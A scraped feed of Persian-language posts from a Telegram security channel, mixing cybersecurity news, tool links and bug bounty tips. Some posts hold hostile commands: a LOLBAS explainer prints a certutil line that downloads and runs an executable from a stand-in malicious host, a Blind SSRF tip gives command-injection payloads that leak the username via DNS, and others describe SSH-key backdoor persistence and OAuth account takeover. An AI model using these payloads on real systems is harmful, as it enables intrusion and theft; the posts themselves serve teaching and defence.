کی میتونه این پلن دانشجویی یک ساله رایگان کرسر رو بگیره
باهم استفاده کنیم☹️

https://cursor.com/students

Читать полностью…

0.0.0.0 Day: Exploiting Localhost APIs From the Browser | Oligo Security
https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser

@mandegar_sec | security researcher

Читать полностью…

🚀 OWASP Smart Contract Top 10 | نسخه 2026 منتشر شد

پروژه OWASP Smart Contract Top 10 که زیرمجموعه‌ی OWASP Smart Contract Security هست، لیستی از ۱۰ تهدید بحرانی امنیتی در قراردادهای هوشمند منتشر کرده که برای توسعه‌ دهندگان Web3 و تیم‌های امنیتی اهمیت بالایی داره. این لیست از داده‌های واقعی حملات و آسیب‌ پذیری‌ها در سال ۲۰۲۵ استخراج شده تا پیش‌ بینی کنه چه ضعف‌ هایی در ۲۰۲۶ بیشترین خطر رو دارن

📎 برای جزئیات کاملتر میتونید از سایت رسمی OWASP دیدن کنید: https://owasp.org/www-project-smart-contract-top-10/

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

#OWASP #SmartContracts #Web3 #OpenSource

Читать полностью…

Semgrep Rules: A collection of Semgrep rules to facilitate vulnerability research.👾

Github: https://github.com/0xdea/semgrep-rules

@mandegar_sec | Channel
Group🫶

Читать полностью…

جزوه کوتاه درباره اصول امنیت عملیاتی (OPSEC) در فضای مجازی

Читать полностью…

Persistence With ssh Keys

یکی از قابلیت های خود SSH این هستش به جای احراز هویت از طریق پسورد میتونیم یک کلید عمومی و خصوصی درست کنیم

ssh-keygen

و با قرار دادن کلید عمومی داخل سرور موردنظر تو مسیر ~/.ssh/authorized_keys بدون نیاز به پسورد ،مستقیم لاگین کرد .
اما همین قابلیت تو دست مهاجم میتونه خطرناک باشه
اگر مهاجم بتونه روی تارگتی که سرویس SSH فعال داشته باشه اسیب پذیری فایل اپلود پیدا کنه (البته اینکه بشه مسیر رو عوض کرد از دردسراش هست ) Public Key خودش رو اپلود کنه میتونه به راحتی از SSH تارگت استفاده کنه و یا حتی وقتی که دسترسی RCE داره و میتونه از این عمل به عنوان Persistence استفاده کنه چون با اضافه کردن Public Key حتی بعد از عوض کردن پسورد های لاگین باز هم میتونیم لاگین کنیم چون کاملا مستقل از پسورد عمل میکنه و میشه یه بکدور خوب و دائمی در نظرش گرفت.
نمونه بارزش هم CVE-2022-40684 هستش که از این تکنیک میشه براش استفاده کرد برای دور زدن احراز هویت در Fortinet .
یا حتی داخل MITRE هم بهش اشاره شده
https://attack.mitre.org/techniques/T1098/004/

Mitigations :

Public Key Authentication رو فقط وقتی
لازم داری فعال کن.

مجوزهای ~/.ssh/ رو 700 و authorized_keys رو 600 نگه دار.

تغییرات فایل‌های حساس رو با ابزارهایی مثل AIDE یا OSSEC مانیتور کن.

دسترسی SSH رو با AllowUsers، IP whitelisting یا VPN محدود کن.
➖➖➖➖➖
CHANNEL
GROUP
DISCORD

Читать полностью…

ADCS Attack Techniques Cheatsheet🫆

https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64


@mandegar_sec | channel
Group🕊

Читать полностью…

Moltbot One-click RCE PoC #Moltbot #RCE
https://github.com/ethiack/moltbot-1click-rce


@mandegar_sec | channel

Читать полностью…

تو تست IDOR فقط به enumirate با عدد ID اکتفا نکن.

یه کار مهم‌ تر اینه که همون endpoint رو با متدهای مختلف HTTP تست کنی؛ مخصوصا

PUT، PATCH و DELETE

اونم با ID کاربرهای دیگه.
خیلی وقتا دولوپر فقط برای متد اصلی (مثلا GET) چک دسترسی گذاشته و بقیه متدها از قلم افتادن
این اشتباه به‌ظاهر کوچیک، تو دنیای واقعی بارها به باگ‌ های خفن منجر شده.
اگه باگ‌ بانتی کار میکنی، این ترفند رو همیشه تو چک‌ لیستت نگه دار.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

⚠️ کاربرای NGINX حواستون باشه!

دیروز یه CVE جدید برای NGINX منتشر شده که مربوط به SSL upstream injection .
اگه از نسخه‌های آسیب‌پذیر استفاده میکنید، حتما هرچه سریع‌ تر آپدیت کنید.

✅ نسخه‌ های امن:

v1.28.2

v1.29.5

🔐 اگه از serversideup/php استفاده میکنید، خبر خوب اینکه پچ تو آخرین ریلیز اضافه شده:

نسخه: v4.3.1
https://github.com/serversideup/docker-php/releases/tag/v4.3.1

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

✏️ یک گروه پژوهشی در حال تکمیل فرآیند ارزیابی علمی طرح «رصد فناوری‌های کلیدی و روندهای نوظهور در حوزه امنیت سایبری با تأکید بر توانمندسازی داخلی» است.

این پژوهش بر پایه تحلیل گسترده داده‌های اختراعات، مقالات علمی و گزارش‌های معتبر بین‌المللی انجام شده و اکنون در مرحله اعتبارسنجی نهایی با بهره‌گیری از دیدگاه‌های متخصصان و صاحب‌نظران حوزه قرار دارد.
لازم به ذکر است این فناوری‌ها بدون هیچ فیلتری در این پرسشنامه قرار گرفته‌اند.

برای تکمیل این مرحله، از شما دعوت می‌کنیم با اختصاص چند دقیقه از زمان خود، در پرسشنامه اعتبارسنجی پژوهش شرکت نمایید. مشارکت شما به ارتقای کیفیت و اتقان نتایج این مطالعه کمک خواهد کرد.

لینک پرسشنامه:

https://survey.porsline.ir/s/nUhSv2QA

Читать полностью…

Kubernetes API Server Paths 🤳


/api
/api/v1
/apis
/apis
/apis/admissionregistration.k8s.io
/apis/admissionregistration.k8s.io/v1beta1
/apis/apiextensions.k8s.io
/apis/apiextensions.k8s.io/v1beta1
/apis/apiregistration.k8s.io
/apis/apiregistration.k8s.io/v1
/apis/apiregistration.k8s.io/v1beta1
/apis/apps
/apis/apps/v1
/apis/apps/v1beta1
/apis/apps/v1beta2
/apis/authentication.k8s.io
/apis/authentication.k8s.io/v1
/apis/authentication.k8s.io/v1beta1
/apis/authorization.k8s.i
/apis/authorization.k8s.io/v1
/apis/authorization.k8s.io/v1beta1
/apis/autoscaling
/apis/autoscaling/v1
/apis/autoscaling/v2beta1
/apis/batch
/apis/batch/v1
/apis/batch/v1beta1
/apis/certificates.k8s.io
/apis/certificates.k8s.io/v1beta1

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

🖊 افزایش حقوق متخصصان امنیت سایبری و IT تصویب شد

- در راستای جذب و نگهداشت نیروهای متخصص فناوری اطلاعات و امنیت سایبری، سقف حقوق و مزایای نخبگان و کارکنان این حوزه افزایش یافت.
- سازمان اداری و استخدامی کشور موظف است فرآیند قانونی افزایش حقوق و فوق‌العاده ویژه برای کارکنان حوزه فناوری اطلاعات و امنیت سایبری را بر اساس تجربه، تخصص و اهمیت وظایف آنها انجام دهد.
- این تصمیم با هدف حفاظت از زیرساخت‌های حیاتی فناوری اطلاعات، امنیت ملی و بهبود بهره‌وری در حوزه‌های دیجیتال و هوشمندسازی اتخاذ شده است.

- همچنین میزان و نحوه اعطای فوق‌العاده بر اساس سطح تخصص، مهارت، کیفیت خدمات و میزان ماند کاری افراد تعیین خواهد شد و دستورالعمل آن طی ۳ تا ۴ ماه آینده توسط سازمان اداری و استخدامی کشور با همکاری وزارت ارتباطات و سازمان برنامه و بودجه تهیه و به تصویب هیئت وزیران خواهد رسید.

دیجیاتو

✅ Channel
💬 Group

Читать полностью…

LOLBAS - توضیح کامل و ساده

چیست؟

LOLBAS مخفف "Living Off The Land Binaries And Scripts" هست. یعنی "فایل‌های اجرایی و اسکریپت‌های بومی سیستم".

تشبیه ساده:

تصور کنید یک دزد وارد خانه شما شود، اما به جای آوردن ابزار خودش، از وسایل داخل خانه شما برای دزدی استفاده کند!

تعریف دقیق:

LOLBAS به فایل‌های قانونی و پیش‌فرض سیستم عامل (مثل cmd.exe، PowerShell، certutil.exe) اشاره دارد که هکرها می‌توانند از آنها برای فعالیت‌های مخرب بدون نصب نرم‌افزار جدید استفاده کنند.

چرا خطرناک است؟

1. شناخته شده نیستند: این ابزارها جزء سیستم عامل هستند، بنابراین آنتی‌ویروس آنها را بلوکه نمی‌کند
2. مجاز هستند: توسط مدیر سیستم (Admin) اجرا می‌شوند
3. قدرتمند هستند: دسترسی کامل به سیستم دارند

مثال‌های معروف:

ابزار سیستم استفاده قانونی استفاده مخرب
certutil.exe مدیریت گواهی‌ها دانلود فایل مخرب از اینترنت
bitsadmin.exe مدیریت دانلود ویندوز دانلود بدافزار
wmic.exe مدیریت سیستم اجرای دستورات از راه دور
msbuild.exe کامپایل کد اجرای کد مخرب
regsvr32.exe ثبت کتابخانه‌ها اجرای اسکریپت از URL

مثال عملی حمله:

# هکر از certutil برای دانلود بدافزار استفاده می‌کند
certutil -urlcache -split -f http://malicious-site.com/virus.exe C:\Windows\Temp\temp.exe

# سپس آن را اجرا می‌کند
C:\Windows\Temp\temp.exe
چگونه کار می‌کند؟

1. هکر به سیستم دسترسی اولیه پیدا می‌کند
2. به جای آوردن ابزار خودش، از ابزارهای موجود سیستم استفاده می‌کند
3. فعالیت مخرب را انجام می‌دهد
4. ردپای کمی به جا می‌گذارد (چون نرم‌افزار جدیدی نصب نکرده)

انواع LOLBAS:

1. LOLBins (Binary)

فایل‌های اجرایی سیستم مثل:

· PowerShell
· Command Prompt
· Windows Management Instrumentation (WMI)

2. LOLScripts

اسکریپت‌های سیستم مثل:

· VBScript
· JavaScript
· Batch Files

3. LOLDrivers

درایورهای قانونی سیستم

وبسایت رسمی:

پروژه LOLBAS در آدرس https://lolbas-project.github.io تمام این ابزارها را مستند کرده است.

روش‌های دفاع:

1. نظارت (Monitoring)

· لاگ‌گیری از اجرای ابزارهای سیستمی
· مانیتورینگ فعالیت‌های غیرعادی

2. محدودسازی (Restriction)

· اجرای Application Whitelisting
· محدود کردن دسترسی کاربران

3. آموزش (Training)

· آموزش تیم امنیت
· آگاهی از تکنیک‌های جدید

4. ابزارهای امنیتی

· استفاده از EDR (Endpoint Detection and Response)
· سیستم‌های نظارت پیشرفته

مزایا برای هکرها:

✅ کمتر شناسایی می‌شوند
✅ نیاز به نصب ابزار ندارند
✅ دسترسی کامل به سیستم دارند
✅ به راحتی قابل پنهان‌سازی هستند

جمع‌بندی:

LOLBAS مانند استفاده از کلید اصلی خانه علیه صاحب خانه است. هکرها از اعتماد سیستم به ابزارهایه
داخلی خودش سوءاستفاده میکنند.

-author : @LeakegeoOo

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

A step-by-step guide to writing an iOS kernel exploit😼

https://alfiecg.uk/2024/09/24/Kernel-exploit.html

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel



Читать полностью…

این موز چیه گیر دادین بش..

Читать полностью…

❌OAuth State Parameter Misbinding → Account Takeover


POC →
1. هنگام بررسی فلو OAuth، مشخص شد state تولید میشه اما در callback به session کاربر بایند نشده.

2. مهاجم یک لاگین OAuth روی اکانت خودش شروع می‌کنه و پاسخ authorization رو ذخیره می‌کنه.

3. قربانی مجبور میشه فلو OAuth رو با state کنترل‌شده توسط مهاجم کامل کنه.

4. اپلیکیشن mismatch بودن state رو تشخیص نمی‌ده و درخواست رو قبول می‌کنه.

5. سشن قربانی به authorization مهاجم لینک میشه.

6.در نتیجه Account Takeover کامل از طریق OAuth Misbinding رخ میده.

🎯 TIPS :
- امنیت OAuth به‌شدت وابسته به اعتبارسنجی دقیق state هست.

- state باید در سمت سرور و به session همون کاربر بایند بشه.

- ضعف‌ هایه لاجیک در پیاده‌سازی OAuth، این روزها تو اپ‌های مدرن زیاد دیده میشه.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

#infosec #hacking #hacker #cybersecurity #bugbounty #bugbountytips

Читать полностью…

اگه به یه Blind SSRF رسیدی، فقط به همون اکتفا نکن.

یه قدم جلوتر برو و چک کن ببین پشتش OS Command Injection خوابیده یا نه.

خیلی وقتا SSRF ورودی رو میبره داخل یه context سیستمی.
اگه اون ورودی داخل shell اجرا بشه، می‌تونی خروجی دستور رو از طریق DNS بیرون بکشی (OOB).

برای گرفتن تعامل خارجی (DNS / HTTP) از Interactsh استفاده کن:
http://app.interactsh.com


TEST KEYS :🍸

اگه این payload ها باعث بشن یه DNS request با مقدار واقعی سیستم سمت سرور برگرده، یعنی قضیه جدیه 👀

https://`whoami`.your-id.oast.fun

https://$(whoami).your-id.oast.fun

https://${USER}.your-id.oast.fun

اگر به‌جای your-id مقدار واقعی یوزر سیستم رو تو لاگ Interactsh دیدی، یعنی ورودی داره داخل shell تفسیر میشه.


Blind SSRF همیشه فقط “یه SSRF ساده” نیست.
گاهی همون نقطه‌ ایه که اگه درست نگاهش کنی، می‌تونه به RCE ختم بشه.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🕊

#BugBounty #BugBountyTips #Hacking

Читать полностью…

🚨 یه بازیگر تهدید جدید به اسم Amaranth-Dragon وارد صحنه شده که احتمال میدن به نهادهای اطلاعاتی چین مرتبط باشه و ظاهراً سراغ اهداف حساس و استراتژیک رفته.

طبق گزارش Check Point Research، این کمپین جاسوسی سایبری از آسیب‌پذیری
CVE-2025-8088 در WinRAR برای نفوذ استفاده می‌کنه.

🔍 روند حمله چطوریه؟

1️⃣ شروع کار با یه ایمیل فیشینگ که داخلش یه فایل RAR آلوده قرار داره.
2️⃣ با سوءاستفاده از باگ WinRAR، یه اسکریپت مخرب بدون اینکه کاربر متوجه بشه داخل پوشه Startup سیستم استخراج میشه.
3️⃣ سیستم آلوده به سرور فرماندهی و کنترل (C2) وصل میشه تا payload اصلی و کلید رمزگشایی رو دریافت کنه.

در نهایت مهاجم میتونه کنترل زیرساخت هدف رو به‌ دست بگیره؛ ابزار هایی مثل Havoc C2 یا TGAmaranth RAT هم تو این عملیات دیده شدن.

🌍 یه نکته جالب اینه که سرور C2 فقط در صورتی پاسخ میده که IP قربانی متعلق به یه منطقه جغرافیایی مشخص باشه ،یعنی کمپین کاملاً هدفمند طراحی شده.


این ماجرا دوباره نشون میده که حتی ابزارهای رایج مثل WinRAR، اگه به‌موقع آپدیت نشن، می‌تونن تبدیل به نقطه ورود حملات پیشرفته بشن.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🍸

Читать полностью…

سلام رفقا
اگ انتقاد یا پیشنهادی دارین نسبت به چنل خوشحال میشم بهم بگید
@Onthebytes
@msecadmins_bot

Читать полностью…

🔥 Credential Dumping with NetExec | Cheatsheet 2026

در این ویدیو، ابزار NetExec (نسخه توسعه‌ یافته CrackMapExec) به‌صورت عملی معرفی و بررسی شده است.
تمرکز اصلی آموزش بر استفاده از این ابزار در سناریوهای شبکه و محیط‌های Active Directory میباشد.

در این محتوا مشاهده خواهید کرد:

➖ نحوه کار با NetExec در عملیات‌های شبکه

➖ اجرای دستورات کاربردی برای تحلیل و شناسایی

➖ مفاهیم مرتبط با Credential Dumping در سیستم‌ های ویندوزی

➖ کاربرد عملی دستورات شبکه در مدیریت و ارزیابی امنیت سیستم‌ها


این آموزش برای افرادی که در حوزه‌های Red Team، تست نفوذ داخلی، یا امنیت Active Directory فعالیت می‌کنند، می‌تواند مفید و کاربردی باشد.

🎥 لینک ویدیو:
https://youtu.be/h46f_0pOeLo?si=i9yOqv59b736O4Wj

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group🖤

Читать полностью…

🚀Extract IPs from Shodan HTML in Seconds!

Sick of digging through HTML? Let grep do the work! 💻

grep -oP '(?<=<strong>).*?(?=</strong>)' ip.html > ips

1️⃣ Save Shodan page source as HTML
2️⃣ Run this command
3️⃣ BOOM 💥 — All IPs extracted to ips!

#Shodan

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🧣

Читать полностью…

🚨 CVE-2025-64328 | امتیاز 8.6 (High)

FreePBX
یه پنل مدیریتی تحت وب برای راه‌اندازی و مدیریت سیستم‌های تلفنی مبتنی بر Asterisk (VoIP) هست.

Affected versions :
> = 17.0.2.36 && < 17.0.3
Patched versions : 17.0.3

به تازگی یه آسیب‌پذیری جدی توی پنل مدیریت FreePBX پیدا شده که منجر به Authenticated Command Injection میشه.
داخل ماژول Endpoint Manager و بخش filestore، تابع

testconnection →check_ssh_connect()

ورودی رو درست هندل نمیکنه و مهاجم لاگین‌ کرده میتونه کامند دلخواه اجرا کنه.
و منجر به اجرای دستورات روی سیستم و گرفتن دسترسی به‌عنوان کاربر asterisk (که توی محیط‌های VoIP خیلی حساسه).

🛡MITIGATION :
➖ ماژول filestore رو به آخرین نسخه آپدیت کنید.
➖ مطمئن بشید فقط کاربران مجاز به پنل مدیریت FreePBX دسترسی دارن.
➖ دسترسی به پنل ادمین (ACP) رو از شبکه‌های غیرقابل اعتماد ببندید
به عنوان مثال با استفاده از ماژول فایروال FreePBX.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

تلگرام سر کیسرو شل کرد بلاخره

Читать полностью…

سلام عزیزان
این پرسشنامه رو یکی از مخاطبین زحمت کشیده و آماده کرده
خوشحال میشم شرکت کنید 🍸

Читать полностью…

بیدارین یه پست بزارم؟

Читать полностью…

CVE-2025-40554 – SolarWinds Web Help Desk
*
Auth Bypass PoC

Читать полностью…

یه حمایت ریز کنید به 3k برسیم☺️😘

Читать полностью…

من یسری کانال که به امنیت ربط داره رو داشتم و اینجا میذارم اگه شما هم دارید زیر این پست کامنت کنید

@mandegar_sec
@dagen_security
@GitBook_s
@GOTOCVE
@hackhaven_new
@Hackhive_channel
@bugbountyhints
@world_of_security
@RadvanSec
@KirTooKarmandi
@pentesterland1
@projectzeroTM
@sec_hint

@thebugbountyhunter
@lu3ky_13

Читать полностью…

Bug Bounty Recon Mindmap🗺

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…